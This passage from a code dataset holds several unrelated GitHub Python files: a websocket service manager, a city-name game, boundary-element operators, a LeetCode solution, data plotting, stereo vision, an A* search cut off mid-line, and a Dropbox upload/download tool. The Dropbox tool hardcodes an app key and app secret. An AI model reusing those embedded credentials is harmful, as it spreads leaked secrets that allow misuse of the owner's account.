print(\"Killing Servman. Good bye!\")\n self.logger.info(f\"Received {self.n_messages} messages, servicing {len(self.id_to_websocket.values())} websockets and {len(self.identifier_to_service_pools.keys())} active agents.\")\n try:\n exit()\n except BaseException:\n exit()\n else:\n self.logger.info(f\"Connection with ID {websocket.request_headers['connection_id']} attempted to kill Servman but failed to guess its secret.\")\n\n def register_task(self, key: str, task: Callable):\n if self.tasks.get(key, None):\n pass\n self.tasks[key] = task\n\n ### Prefabs / Get\n async def get_service_pool(self, identifier, websocket):\n service_pool: ServicePool = self.identifier_to_service_pools.get(identifier, None)\n if not service_pool:\n response: IParcel = { \n 'routing': websocket.request_headers['agent'],\n 'action': 'handle_servman_error',\n 'data': { 'exception': 'ServicePoolNotFound', 'message': f\"Service pool with identifier {identifier} not found\" }\n }\n await websocket.send(json.dumps(response))\n return None\n else:\n return service_pool\n \n ### Prefabs / Other\n async def build_pipeline(self, websocket):\n \"\"\"\n Clients and services communicate through a Pipeline. A client\n may establish any number of Pipelines. 
This may change\n in the future.\n \"\"\"\n # First identify the service\n identifier = ''\n purpose = ''\n try:\n identifier = websocket.request_headers['identifier']\n purpose = websocket.request_headers['purpose']\n except KeyError:\n self.logger.error(\"KeyError in build_pipeline\")\n return\n\n\n identifier = websocket.request_headers['identifier']\n service_pool = await self.get_service_pool(identifier, websocket)\n if not service_pool:\n return\n\n purpose = websocket.request_headers['purpose']\n pipeline: Pipeline = service_pool.pipelines.get(purpose, None)\n if not pipeline:\n pipeline = Pipeline(purpose)\n service_pool.pipelines[purpose] = pipeline\n\n agent = websocket.request_headers['agent']\n if agent == 'client':\n pipeline.client_connection_id = websocket.request_headers['connection_id']\n pipeline.client_connection = websocket\n elif agent == 'service':\n pipeline.service_connection_id = websocket.request_headers['connection_id']\n pipeline.service_connection = websocket\n \n if not pipeline.bridged and pipeline.client_connection and pipeline.service_connection:\n pipeline.connections[pipeline.client_connection] = pipeline.service_connection\n pipeline.connections[pipeline.service_connection] = pipeline.client_connection\n\n client_parcel = {\n 'routing': 'client',\n 'action': 'catch_proxy_credentials',\n 'data': {'purpose': purpose, 'connection_id': pipeline.service_connection_id }\n }\n service_parcel = {\n 'routing': 'service',\n 'action': 'catch_proxy_credentials',\n 'data': {'purpose': purpose, 'connection_id': pipeline.client_connection_id }\n }\n await pipeline.client_connection.send(json.dumps(client_parcel))\n await pipeline.service_connection.send(json.dumps(service_parcel))\n pipeline.bridged = True\n elif not pipeline.bridged and pipeline.client_connection and not pipeline.service_connection:\n bridge_service_parcel = {\n 'routing': 'service',\n 'action': 'bridge_pipeline',\n 'data': { 'purpose': purpose, 'identifier': identifier }\n }\n await service_pool.service_connection.send(json.dumps(bridge_service_parcel))\n else:\n self.logger.error(\"@@@@@@@@@@@@@@@@@@@@@@@@ >< This should never happen. Synchronization error? 
Bad request?\")\n\n ### Tasks\n async def run_server(self):\n print(\"Starting Servman.\")\n\n extra_headers = [\n ('agent', 'servman'),\n ('agent_id', self._agent_id)\n ]\n\n async def handle_websocket(websocket, request_path):\n await self.register_websocket(websocket)\n \n try:\n async for message in websocket:\n self.n_messages += 1\n parcel: IParcel = json.loads(message)\n await self.routes[parcel['routing']](parcel, websocket)\n except JSONDecodeError:\n self.logger.exception(f\"JSON Error in ServiceManager.handle_websocket: Message not encoded in JSON.\\n\\n\")\n except ConnectionClosedError:\n self.logger.exception(f\"Websocket {websocket} closed unexpectedly.\")\n except Exception as e:\n self.logger.exception(f\"\\n\\nOther Error in ServiceManager.handle_websocket: {e}\\n\\n\")\n traceback.print_exc()\n new_parcel: IParcel = {\n 'routing': parcel['routing'],\n 'action': 'handle_servman_error',\n 'data': { 'parcel': parcel, 'exception': e.__str__(), 'message': 'exception occurred while handling websocket' }\n }\n await websocket.send(json.dumps(new_parcel))\n\n await self.unregister_websocket(websocket)\n\n self.server = await websockets.serve(\n handle_websocket,\n host=self.host,\n port=self.port,\n max_queue=2048,\n max_size=None,\n extra_headers=extra_headers,\n origins=[None]\n )\n\n while not self.killed:\n await asyncio.Future()\n\n\n async def log_metrics(self):\n while not self.killed:\n await asyncio.sleep(3)\n self.logger.info(f\"Received {self.n_messages} messages, servicing {len(self.id_to_websocket.values())} websockets and {len(self.identifier_to_service_pools.keys())} active agents.\")\n\n\n async def do_work(self):\n tasks = [\n self.run_server(),\n self.log_metrics()\n ]\n await asyncio.gather(*tasks)\n\n def run(self):\n multiprocessing.set_start_method(\"spawn\")\n loop = asyncio.get_event_loop()\n loop.run_until_complete(self.do_work())","repo_name":"dggfi/Servman","sub_path":"src/servman/servman.py","file_name":"servman.py","file_ext":"py","file_size_in_byte":17672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"42749590847","text":"from codecs import utf_8_encode\n\nclass CityGame:\n def __init__(self, file_name) :\n self.alfabet_str = 'АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЭЮЯ'\n try:\n with open(file_name, 'r', encoding='utf-8') as file:\n cities_list = file.readlines()\n self.cities_dict = {letter: [city.strip('\\n') for city in cities_list if city.startswith(letter)] \n for letter in self.alfabet_str if len([city.strip('\\n') for city in cities_list if city.startswith(letter)]) > 0}\n except IOError:\n raise IOError(\"Reading file error\")\n\n def getCityByLetter(self, letter):\n if not isinstance(letter, str) or len(letter) > 1:\n return 'Not letter'\n letter = letter.upper()\n if letter not in self.cities_dict:\n return 'No cities starting with this letter'\n for key in self.cities_dict:\n if key == letter:\n if len(self.cities_dict[key]) == 0:\n return 'Ran out of cities starting with this letter'\n answer_dict = {}\n for i in range(len(self.cities_dict[key])):\n city = self.cities_dict[key][i]\n last_letter = city[len(city) - 1].upper()\n if last_letter in self.cities_dict:\n if len(self.cities_dict[last_letter]) not in answer_dict:\n answer_dict[len(self.cities_dict[last_letter])] = i \n answer = self.cities_dict[key][answer_dict[min(answer_dict)]]\n new_cities_list = self.cities_dict[letter]\n del new_cities_list[answer_dict[min(answer_dict)]]\n self.cities_dict[letter] = new_cities_list\n return 
answer","repo_name":"VasinDA/tasks","sub_path":"task_5/city_game.py","file_name":"city_game.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20415586167","text":"import numpy as _np\nfrom bempp.api.utils.linear_operator import LinearOperator\n\n\ndef _sum(op1, op2):\n\n if op1 is None:\n return op2\n elif op2 is None:\n return op1\n else:\n return op1 + op2\n\ndef _prod(op1, op2):\n\n if op1 is None or op2 is None:\n return None\n else:\n return op1 * op2\n\nclass BlockedOperator(object):\n def __init__(self, m, n):\n\n self._m = m\n self._n = n\n\n self._operators = _np.empty((m, n), dtype=_np.object)\n self._rows = m * [False]\n self._cols = n * [False]\n\n def __getitem__(self, key):\n\n return self._operators[key]\n\n def __setitem__(self, key, operator):\n\n self._operators[key] = operator\n self._rows[key[0]] = True\n self._cols[key[1]] = True\n\n def _fill_complete(self):\n\n return (False not in self._cols) and (False not in self._rows)\n\n def weak_form(self):\n\n if not self._fill_complete():\n raise ValueError(\"Each row and column must have at least one operator\")\n\n discrete_operator = BlockedDiscreteOperator(self._m, self._n)\n\n for i in range(self._m):\n for j in range(self._n):\n if self._operators[i, j] is not None:\n discrete_operator[i, j] = self._operators[i, j].weak_form()\n\n return discrete_operator\n\n def strong_form(self, mode='simple'):\n\n if not self._fill_complete():\n raise ValueError(\"Each row and column must have at least one operator\")\n\n\n if mode=='full':\n discrete_operator = BlockedDiscreteOperator(self._m, self._n)\n\n for i in range(self._m):\n for j in range(self._n):\n if self._operators[i, j] is not None:\n discrete_operator[i, j] = self._operators[i, j].strong_form()\n return discrete_operator \n\n elif mode=='simple':\n from bempp.api import InverseSparseDiscreteBoundaryOperator\n from bempp.api.operators.boundary.sparse import identity\n\n blocked = BlockedDiscreteOperator(self.ndims[0], self.ndims[0])\n\n for i in range(self.ndims[0]):\n op = None\n for j in range(self.ndims[1]):\n if self[i, j] is not None:\n op = self[i, j]\n break\n\n blocked[i, i] = InverseSparseDiscreteBoundaryOperator(\n identity(op.range, op.dual_to_range, \n op.dual_to_range).weak_form())\n return blocked * self.weak_form() \n else:\n raise ValueError(\"Unknown value for 'mode'. 
Allowed values are 'simple' and 'full'\")\n\n def __add__(self, other):\n\n if self.ndims != other.ndims:\n raise ValueError(\"Both blocked operators must have the same dimensions.\")\n\n blocked_operator = BlockedOperator(self.ndims[0], self.ndims[1])\n\n for i in range(self.ndims[0]):\n for j in range(self.ndims[1]):\n if other[i, j] is None:\n blocked_operator[i, j] = self[i, j]\n elif self[i, j] is None:\n blocked_operator[i, j] = other[i, j]\n else:\n blocked_operator[i, j] = self[i, j] + other[i, j]\n return blocked_operator\n\n def __neg__(self):\n return self.__mul__(-1)\n\n def __sub__(self, other):\n return self.__add__(-other)\n\n def __mul__(self, other):\n\n import numpy as np\n if np.isscalar(other):\n\n blocked_operator = BlockedOperator(self.ndims[0], self.ndims[1])\n for i in range(self.ndims[0]):\n for j in range(self.ndims[1]):\n if self[i, j] is not None:\n blocked_operator[i, j] = other * self[i, j]\n return blocked_operator\n elif isinstance(other, BlockedOperator):\n if self.ndims[1] != other.ndims[0]:\n raise ValueError(\"Dimensions are not compatible.\")\n blocked_operator = BlockedOperator(self.ndims[0], other.ndims[1])\n for i in range(self.ndims[0]):\n for j in range(other.ndims[1]):\n for k in range(self.ndims[1]):\n blocked_operator[i, j] = _sum(blocked_operator[i, j],\n _prod(self[i, k], other[k, j]))\n return blocked_operator\n else:\n return NotImplemented\n\n def __rmul__(self, other):\n\n import numpy as np\n if np.isscalar(other):\n return self.__mul__(other)\n else:\n return NotImplemented\n\n\n def get_ndims(self):\n\n return (self._m, self._n)\n\n ndims = property(get_ndims)\n\n\nclass BlockedDiscreteOperator(LinearOperator):\n def __init__(self, m, n):\n\n self._m = m\n self._n = n\n self._operators = _np.empty((m, n), dtype=_np.object)\n self._rows = _np.zeros(m, dtype=int)\n self._cols = _np.zeros(n, dtype=int)\n\n def __getitem__(self, key):\n\n return self._operators[key]\n\n def __setitem__(self, key, operator):\n\n if self._rows[key[0]] != 0:\n if operator.shape[0] != self._rows[key[0]]:\n raise ValueError(\"Incompatible number of rows\")\n else:\n self._rows[key[0]] = operator.shape[0]\n\n if self._cols[key[1]] != 0:\n if operator.shape[1] != self._cols[key[1]]:\n raise ValueError(\"Incompatible number of columns\")\n else:\n self._cols[key[1]] = operator.shape[1]\n self._operators[key] = operator\n\n def _fill_complete(self):\n\n if (0 in self._rows) or (0 in self._cols):\n return False\n\n return True\n\n def _matvec(self, x):\n\n from bempp.api.utils.data_types import combined_type\n\n if x.ndim == 1:\n x_new = _np.expand_dims(x, 1)\n return self.matvec(x_new).ravel()\n\n if not self._fill_complete():\n raise ValueError(\"Not all rows or columns contain operators.\")\n\n row_dim = 0\n res = _np.zeros((self.shape[0], x.shape[1]), dtype=combined_type(self.dtype, x.dtype))\n\n for i in range(self._m):\n col_dim = 0\n local_res = res[row_dim:row_dim + self._rows[i], :]\n for j in range(self._n):\n local_x = x[col_dim:col_dim + self._cols[j], :]\n if self._operators[i, j] is not None:\n op_is_complex = _np.iscomplexobj(self._operators[i, j].dtype.type(1))\n if _np.iscomplexobj(x) and not op_is_complex:\n local_res[:] += (self._operators[i, j].dot(_np.real(local_x)) +\n 1j * self._operators[i, j].dot(_np.imag(local_x)))\n else:\n local_res[:] += self._operators[i, j].dot(local_x)\n col_dim += self._cols[j]\n row_dim += self._rows[i]\n return res\n\n def _get_shape(self):\n return (_np.sum(self._rows), _np.sum(self._cols))\n\n def 
_get_dtype(self):\n\n from bempp.api.utils.data_types import combined_type\n\n d = 'float64'\n for obj in self._operators.ravel():\n if obj is not None:\n d = combined_type(d, obj.dtype)\n\n return d\n\n def _get_ndims(self):\n\n return (self._m, self._n)\n\n def _get_row_dimensions(self):\n return self._rows\n\n def _get_column_dimensions(self):\n return self._cols\n\n def _as_matrix(self):\n if not self._fill_complete():\n raise ValueError(\"Not all rows or columns contain operators.\")\n rows = []\n for i in range(self._m):\n row = []\n for j in range(self._n):\n if self[i, j] is None:\n row.append(_np.zeros((self._rows[i], self._cols[j])))\n else:\n row.append(self[i, j].as_matrix())\n rows.append(_np.hstack(row))\n return _np.vstack(rows)\n\n shape = property(_get_shape)\n dtype = property(_get_dtype)\n ndims = property(_get_ndims)\n row_dimensions = property(_get_row_dimensions)\n column_dimensions = property(_get_column_dimensions)\n","repo_name":"micromagnetics/bempp","sub_path":"python/bempp/api/assembly/blocked_operator.py","file_name":"blocked_operator.py","file_ext":"py","file_size_in_byte":8289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"30067927552","text":"from typing import List\n\nInput: [2, 3, -2, 4]\nOutput: 6\n\n\nclass Solution:\n def maxProduct(self, nums: List[int]) -> int:\n maximum = big = small = nums[0]\n for n in nums[1:]:\n big, small = max(n, n*big, n*small), min(n, n*big, n*small)\n maximum = max(maximum, big)\n return maximum\n\n\ng = Solution()\nprint(g.maxProduct([-4, -3, -2]))\n\n# Runtime: 40 ms, faster than 97.85 % of Python3 online submissions for Maximum Product Subarray.\n# Memory Usage: 13.1 MB, less than 90.12 % of Python3 online submissions for Maximum Product Subarray.\n","repo_name":"sunling/Algorithmic-Study","sub_path":"week6-DP/M152MaximumProductSubarray.py","file_name":"M152MaximumProductSubarray.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"2071951705","text":"import json\nimport os\n\nimport folium\nimport jieba\nfrom folium.plugins import HeatMap\nfrom pyecharts.charts import Bar\nfrom wordcloud import WordCloud\n\n\ndef draw_heat_map(data, result_path, file_name):\n heat_map_counter = {}\n for i in data:\n longitude = float('%.1f' % float(i.get('longitude')))\n latitude = float('%.1f' % float(i.get('latitude')))\n name = str(latitude) + '-' + str(longitude)\n if name in heat_map_counter:\n heat_map_counter[name][2] = heat_map_counter[name][2] + 1\n else:\n heat_map_counter[name] = [latitude, longitude, 1]\n result = [[j[0], j[1], j[2]] for i, j in heat_map_counter.items()]\n map_ = folium.Map(location=[35, 110], zoom_start=5)\n HeatMap(result).add_to(map_)\n map_.save(os.path.join(result_path, file_name + '.html'))\n\n\ndef draw_year_bar(title, data, result_path):\n counter = {}\n for each in data:\n o_time = each.get('o_time').split(' ')[0].split('-')[0]\n if o_time in counter:\n counter[o_time] += 1\n else:\n counter[o_time] = 1\n counter = dict(sorted(counter.items(), key=lambda item: item[0]))\n\n bar = Bar()\n attrs = [i for i, j in counter.items()]\n values = [j for i, j in counter.items()]\n bar.add_xaxis(attrs)\n bar.add_yaxis('111', values)\n bar.render(os.path.join(result_path, '%s.html' % title))\n\n\n'''统计词频'''\n\n\ndef statistics(texts, stopwords):\n words_dict = {}\n for text in texts:\n temp = jieba.cut(text)\n for t in temp:\n if t in stopwords or t 
== 'unknown':\n continue\n if t in words_dict.keys():\n words_dict[t] += 1\n else:\n words_dict[t] = 1\n return words_dict\n\n\ndef draw_word_cloud(words, title, result_path):\n wc = WordCloud(font_path='simkai.ttf', background_color='white', max_words=2000, width=1920, height=1080,\n margin=5)\n wc.generate_from_frequencies(words)\n wc.to_file(os.path.join(result_path, title + '.png'))\n\n\ndef main():\n data_source_path = '../../data.json'\n result_path = './result'\n if not os.path.exists(result_path):\n os.mkdir(result_path)\n\n data = json.load(open(data_source_path, 'r', encoding='utf-8'))\n\n # 热力图\n draw_heat_map(data, result_path, 'heatmap')\n\n # 柱状图\n\n draw_year_bar(title='每年地震发生频次统计', data=data, result_path=result_path)\n\n # 词云\n stopwords = open('stopwords.txt', 'r', encoding='utf-8').read().split('\\n')[:-1]\n texts = [each.get('location') for each in data]\n words_dict = statistics(texts, stopwords)\n draw_word_cloud(words_dict, '地震地点名词云', result_path=result_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yanyi5496/commonutil","sub_path":"earthquake/earthquake/analyze/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21232388611","text":"import requests as req\r\nimport json\r\nimport sys\r\nimport os\r\nimport webbrowser\r\nimport logging\r\nimport time\r\n\r\nimport loggercnf\r\nimport launcher\r\n\r\n\r\nlogger = logging.getLogger('mainapp')\r\n\r\n\r\n# Сonstants.\r\nAPP_KEY = 'mlfjqpykeprpqso'\r\nAPP_SECRET = '3q9y9dk1oav1tvj'\r\nAUTH_URL = f'https://www.dropbox.com/oauth2/authorize?' \\\r\n f'client_id={APP_KEY}&response_type=code'\r\n\r\n\r\n# Function for obtaining an access token.\r\ndef authorization():\r\n webbrowser.open_new(AUTH_URL)\r\n print('Click \"Continue\" on the site that opens, '\r\n 'than click \"Allow\" '\r\n 'and copy your access token to the next request.')\r\n auth_code = input('Enter the authorization code: ')\r\n token_url = \"https://api.dropboxapi.com/oauth2/token\"\r\n params = {\r\n \"code\": auth_code,\r\n \"grant_type\": \"authorization_code\",\r\n \"client_id\": APP_KEY,\r\n \"client_secret\": APP_SECRET\r\n }\r\n try:\r\n r = req.post(token_url, data=params)\r\n response_data = json.loads(r.text)\r\n logger.info('Access token received successfully.')\r\n return response_data.get('access_token')\r\n except ValueError:\r\n logger.critical('Error getting access token')\r\n\r\n\r\n# The function that downloads the specified file.\r\ndef uploader(src_path_file, dropbox_folder, access_token):\r\n upload_url = 'https://content.dropboxapi.com/2/files/upload'\r\n try:\r\n with open(f'{src_path_file}', 'rb') as f:\r\n data = f.read()\r\n except:\r\n logger.error(f'Impossible to read next file {src_path_file}')\r\n headers = {\r\n 'Authorization': f'Bearer {access_token}',\r\n 'Dropbox-API-Arg': f'{{\"path\":{dropbox_folder},'\r\n f'\"mode\": \"add\",'\r\n f'\"autorename\": true,'\r\n f'\"mute\": false,'\r\n f'\"strict_conflict\": false}}',\r\n 'Content-Type': 'application/octet-stream'\r\n }\r\n try:\r\n r = req.post(upload_url, headers=headers, data=data)\r\n if r:\r\n print('File sent successfully.')\r\n logger.info('File sent successfully.')\r\n else:\r\n print('Bad request. 
Check dst_path.')\r\n logger.critical(r)\r\n except:\r\n print('ER')\r\n return\r\n\r\n\r\n# The function that loads the specified file.\r\ndef downloader(src_path, dst_path, access_token):\r\n download_url = 'https://content.dropboxapi.com/2/files/download'\r\n headers = {\r\n 'Authorization': f'Bearer {access_token}',\r\n 'Dropbox-API-Arg': f'{{\"path\":{src_path}}}'\r\n }\r\n r = req.post(download_url, headers=headers)\r\n try:\r\n with open(f'{dst_path}', 'wb') as f:\r\n f.write(r.content)\r\n if r:\r\n print('File received successfully.')\r\n logger.info('File received successfully.')\r\n else:\r\n logger.critical(r.text)\r\n except PermissionError:\r\n logger.error(f'Permission denied: {dst_path}')\r\n return\r\n\r\n\r\n# put/get src_path dst_path\r\nif len(sys.argv) < 3:\r\n print(f'Invalid number of arguments {len(sys.argv)}.'\r\n f'\\nMust be 3: put or get, '\r\n f'source path and destination path.')\r\n logger.error(f'Invalid number of arguments {len(sys.argv)}.')\r\nelse:\r\n # DropBox file size limit for download function.\r\n dp_size_limiter = 150000000\r\n key_list = [\r\n 'util',\r\n 'action',\r\n 'src_path',\r\n 'dst_path'\r\n ]\r\n argv_list = [i for i in sys.argv]\r\n user_args_dict = dict(zip(key_list, argv_list))\r\n if user_args_dict.get('action') == 'get':\r\n logger.info('Started \"downloader\" fun.')\r\n downloader(\r\n f'\"{user_args_dict.get(\"src_path\")}\"',\r\n user_args_dict.get(\"dst_path\"),\r\n authorization()\r\n )\r\n elif user_args_dict.get('action') == 'put':\r\n if os.path.exists(user_args_dict.get('src_path')):\r\n if os.path.getsize(user_args_dict.get('src_path')) <= dp_size_limiter:\r\n logger.info('Started \"uploader\" fun.')\r\n uploader(\r\n user_args_dict.get(\"src_path\"),\r\n f'\"{user_args_dict.get(\"dst_path\")}\"',\r\n authorization()\r\n )\r\n else:\r\n print('Exceeded the file size for the specified function. '\r\n 'The file should be no more than 150Mb')\r\n logger.error(f'File size more than 150Mb: '\r\n f'{os.path.getsize(user_args_dict.get(\"src_path\"))}')\r\n else:\r\n print('The file at the specified path is missing '\r\n 'or the path is incorrect.')\r\n logger.error(f'No file or wrong path: '\r\n f'{user_args_dict.get(\"src_path\")}')\r\n else:\r\n print('File operation not possible. 
Please, use \"get\" or \"put\".')\r\n logger.error(f'Unknown action \"{user_args_dict.get(\"action\")}\"')\r\n\r\nprint('This window will close in 10 seconds.')\r\ntime.sleep(10)\r\n\r\n","repo_name":"Timofey-Lutsenko/InfoTechTest","sub_path":"mainapp.py","file_name":"mainapp.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8448109652","text":"import os\nfrom prometheus_client import start_http_server\nfrom file_uploader import Uploader\n\n\nif __name__ == '__main__':\n\n METRICS_PORT = int(os.environ.get(\"METRICS_PORT\", \"9001\"))\n start_http_server(METRICS_PORT)\n\n camera_name = os.environ.get(\"CAMERA_NAME\")\n aws_s3_host = os.environ.get(\"AWS_S3_HOST\")\n aws_s3_access_key = os.environ.get(\"AWS_S3_ACCESS_KEY\")\n aws_s3_secret_key = os.environ.get(\"AWS_S3_SECRET_KEY\")\n aws_s3_bucket = os.environ.get(\"AWS_S3_BUCKET\")\n cache_directory = os.environ.get(\"CACHE_DIRECTORY\")\n\n uploader = Uploader(camera_name, aws_s3_host, aws_s3_access_key, aws_s3_secret_key, aws_s3_bucket, cache_directory)\n uploader.run()\n","repo_name":"CiscoDevNet/greatbear","sub_path":"edge-frame-grabber/app/image-uploader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13555117855","text":"# -*- coding:utf-8 -*-\n__author__ = \"leo\"\n\n\ndef black_wrapper(func):\n def run(*args, **kwargs):\n base_page = args[0]\n try:\n return func(*args, **kwargs)\n except Exception as e:\n base_page.driver.implicitly_wait(10)\n for black in base_page.black_list:\n elements = base_page.finds(*black)\n if len(elements) > 0:\n elements[0].click()\n return func(*args, **kwargs)\n raise e\n\n return run\n","repo_name":"Leofighting/hogwarts-16-xiaoyao","sub_path":"app/homework_0107/black_handle.py","file_name":"black_handle.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"38033558170","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport json\n\ndef create_output(vertices, colors, filename):\n colors = colors.reshape(-1, 3)\n vertices = np.hstack([vertices.reshape(-1,3), colors])\n\n ply_header = '''ply\n format ascii 1.0\n element vertex %(vert_num)d\n property float x\n property float y\n property float z\n property uchar red\n property uchar green\n property uchar blue\n end_header\n '''\n\n with open(filename, 'w') as f:\n f.write(ply_header % dict(vert_num=len(vertices)))\n np.savetxt(f, vertices, '%f %f %f %d %d %d')\n \nL_FPATH = '/Users/flap/MasterThesis/source/food-volume-stereo/calibrate_images/ip12_image_small/IMG_7161.jpeg'\nR_FPATH = '/Users/flap/MasterThesis/source/food-volume-stereo/calibrate_images/ip12_image_small/IMG_7163.jpeg'\n\nimage_left = cv2.imread(L_FPATH)\nimage_right = cv2.imread(R_FPATH)\n\nimage_left = cv2.cvtColor(image_left, cv2.COLOR_BGR2GRAY)\nimage_right = cv2.cvtColor(image_right, cv2.COLOR_BGR2GRAY)\n\noutput_file = \"out.ply\"\n\nif image_left.shape[0] != image_right.shape[0] or \\\n image_left.shape[1] != image_right.shape[1]:\n raise TypeError(\"Input images must be of the same size\")\n\n# downscale images for faster processing\nimage_left = cv2.pyrDown(image_left) \nimage_right = cv2.pyrDown(image_right)\n\nimage_left = cv2.pyrDown(image_left) \nimage_right = cv2.pyrDown(image_right)\n\nimage_left = 
cv2.pyrDown(image_left) \nimage_right = cv2.pyrDown(image_right)\n\n# disparity range is tuned for 'aloe' image pair\nwin_size = 1\nmin_disp = 16\nmax_disp = min_disp * 4\nnum_disp = max_disp - min_disp # Needs to be divisible by 16\nstereo = cv2.StereoSGBM(minDisparity = min_disp,\n numDisparities = num_disp,\n SADWindowSize = win_size,\n uniquenessRatio = 10,\n speckleWindowSize = 20,\n speckleRange = 16,\n disp12MaxDiff = 1,\n P1 = 8*3*win_size**2,\n P2 = 32*3*win_size**2,\n fullDP = True\n)\n\n# disparity_map = stereo.compute(image_left, image_right)\ndisparity_map = stereo.compute(image_left, image_right).astype(np.float32) / 16.0\n\n\n\nprint(\"\\nComputing the disparity map ...\")\n\n\n# print \"\\nGenerating the 3D map ...\"\nh, w = image_left.shape[:2]\nfocal_length = 0.8*w \n\n# Perspective transformation matrix\nQ = np.float32([[1, 0, 0, -w/2.0],\n [0,-1, 0, h/2.0], \n [0, 0, 0, -focal_length], \n [0, 0, 1, 0]])\n\npoints_3D = cv2.reprojectImageTo3D(disparity_map, Q)\ncolors = cv2.cvtColor(image_left, cv2.COLOR_GRAY2RGB)\nmask_map = disparity_map > disparity_map.min()\noutput_points = points_3D[mask_map]\noutput_colors = colors[mask_map]\n\nprint(\"\\nCreating the output file ...\\n\")\ncreate_output(output_points, output_colors, output_file)","repo_name":"flapperz/food-volume-stereo","sub_path":"stereo.py","file_name":"stereo.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9639298215","text":"import collections\nfrom collections import OrderedDict\n\nrd = {}\nrd[\"s\"] = 1\nrd['liuzhuang'] = 2\nrd['asdf'] = 3\nrd['wwww']= 43\nrd['qwer'] = 12\n\nfor key in rd.keys():\n print(key)\nprint(\"#######################################################\")\n\nod = OrderedDict()\nod[\"s\"] = 1\nod['liuzhuang'] = 2\nod['asdf'] = 3\nod['wwww']= 43\nod['qwer'] = 12\n\nfor kry in od.keys():\n print(kry)\nfor kk, vv in od.items():\n print(str(kk) + \" \" + str(vv))","repo_name":"zhuango/python","sub_path":"pythonLearning/dataStructure/OrderedDict.py","file_name":"OrderedDict.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"30174182642","text":"from queue import PriorityQueue\nimport pandas as pd\nimport cv2\n\nclass A_Star:\n def __init__(self, filename, start, goal):\n # Converting csv to dictionary\n self.filename = filename\n self.df = pd.read_csv(filename)\n self.dict = self.csv2Dict()\n\n self.start = self.arrayCord(start)\n self.goal = self.arrayCord(goal)\n self.g = 0\n self.h = float(\"inf\")\n self.f = self.g + self.h\n self.pathList = [self.start]\n self.pathDict = {self.g : self.start}\n print(\"Initializing Completed!!!\")\n\n def csv2Dict(self):\n print(\"Processing Data...\")\n for i in range(1, len(self.df.x)):\n if abs(self.df.x[i] - self.df.x[i-1]) < 1.5:\n self.df.x[i] = self.df.x[i-1]\n\n if abs(self.df.y[i] - self.df.y[i-1]) < 1.5:\n self.df.y[i] = self.df.y[i-1]\n\n self.df = self.df.drop_duplicates()\n self.df.sort_values(by = 'x')\n # df_new = self.df.groupby(['x']).y.count()[lambda k: k < 5]\n # values = df_new.index.to_list()\n # self.df = self.df[self.df.x.isin(values) == False]\n self.df.to_csv(self.filename, header = True, index = False)\n self.arr = self.df.values.tolist()\n self.arr.sort()\n cordDict = {i[0] : [j[1] for j in self.arr if j[0] == i[0]] for i in self.arr}\n\n return cordDict\n\n def arrayCord(self, cord):\n # Converting given co-ordinates 
into\n # suitable co-ordinates belonging to array\n if cord in self.arr:\n return cord\n\n else:\n xC, yC = cord\n\n # For x\n keys = list(self.dict.keys())\n for i in range(len(keys)):\n if xC <= keys[i]:\n if abs(keys[i] - xC) >= abs(keys[i-1] - xC):\n x = keys[i-1]\n elif i == 0:\n x = keys[i] \n else:\n x = keys[i]\n break\n\n else:\n x = keys[-i]\n \n # For y\n for i in range(len(self.dict[x])):\n if yC <= self.dict[x][i]:\n if abs(self.dict[x][i] - yC) >= abs(self.dict[x][i-1] - yC):\n y = self.dict[x][i-1]\n \n elif i == 0:\n y = self.dict[x][i] \n else:\n y = self.dict[x][i]\n break\n\n else:\n y = self.dict[x][-1]\n\n # print(x, y)\n return (x, y) \n\n def pathVerify(self, coordinate):\n if self.euclidean(coordinate, self.pathList[-1]) < 140:\n return True\n return False\n \n def euclidean(self, current, goal):\n # To find euclidean distance\n x1, y1 = current\n x2, y2 = goal\n res = ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n # print(current, (x2, y2))\n return round(res)\n\n def neighborClean(self, cord_list, comparator):\n cord_list.sort()\n maxVal = max(cord_list)\n minVal = min(cord_list)\n avgCom = comparator\n\n if (maxVal - minVal) > 200:\n if (maxVal - avgCom) > (avgCom - minVal):\n cord_list.pop(-1)\n else:\n cord_list.pop(0)\n \n return cord_list\n\n # Inclusive of digonals also\n def neighbors(self, current):\n # Only when current is part of array coordinates\n neighborList = []\n \n xC, yC = self.arrayCord(current)\n # print((xC, yC))\n keys = list(self.dict.keys())\n # For x when y is constant\n if xC in keys:\n # print(\"In Keys\", current)\n loc = keys.index(xC)\n if loc > 0 and loc < len(keys) - 1:\n x_list = [keys[loc - 1], keys[loc], keys[loc + 1]]\n elif loc == 0:\n x_list = [keys[loc], keys[loc + 1]]\n elif loc == len(keys) -1:\n x_list = [keys[loc - 1], keys[loc]]\n \n # print(x_list)\n # For y when x is constant\n y_all = []\n for i in x_list:\n\n if yC in self.dict[i]:\n loc = self.dict[i].index(yC)\n yCI = yC\n else:\n _, yCI = self.arrayCord((i, yC))\n if abs(yCI - yC)/max(yCI, 